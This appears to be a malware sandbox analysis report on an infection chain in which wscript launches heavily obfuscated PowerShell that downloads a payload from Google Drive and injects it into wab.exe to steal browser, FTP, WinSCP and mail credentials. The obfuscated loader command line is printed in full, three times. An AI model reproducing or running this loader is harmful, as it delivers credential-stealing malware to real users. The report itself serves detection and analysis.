Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Code function: 16_2_007E3675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

16_2_007E3675

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000F.00000002.882856308898.0000000020C85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 9032, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
172.217.2.33	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
142.250.191.110	drive.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
drive.google.com	142.250.191.110	true
drive.usercontent.google.com	172.217.2.33	true
ip-api.com	208.95.112.1	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for domain / URL

Source: http://pesterbdd.com/images/Pester.png4	Virustotal: Detection: 10%	Perma Link
Source: http://pesterbdd.com/images/Pester.pngh	Virustotal: Detection: 12%	Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 9%	Perma Link

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.30:49951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.2.33:443 -> 192.168.11.30:49952 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.878914102008.0000000007121000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: re.pdb; source: powershell.exe, 0000000D.00000002.878917749751.0000000008791000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 0000000D.00000002.878904636075.0000000002A96000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdbGCTL source: GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr
Source:	Binary string: wab.pdb source: GrOcCQC.exe, GrOcCQC.exe, 00000010.00000000.879000905723.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe, 00000012.00000002.879083099115.00000000007E1000.00000020.00000001.01000000.00000009.sdmp, GrOcCQC.exe.15.dr

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TuX3pGVQOuYuN0PVf0S1vuOovPZc76t5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1kTBjYXwSaLf73tP79eJTEXDnkCOgv_e4&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: powershell.exe, 00000009.00000002.882935125828.000002167215A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878904636075.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845480817.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000009.00000002.882935125828.000002167215A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878904636075.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878845480817.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.0000000005102000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.878864713619.0000000005108000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.0000000005102000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000D.00000002.878917749751.0000000008716000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: wab.exe, 0000000F.00000002.882856308898.0000000020C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000009.00000002.882848532717.000002165B480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882926973942.0000021669E6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878910754934.0000000005874000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.878906475177.0000000004828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000009.00000002.882848532717.000002165A028000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000009.00000002.882848532717.000002165B32B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.882848532717.000002165B300000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
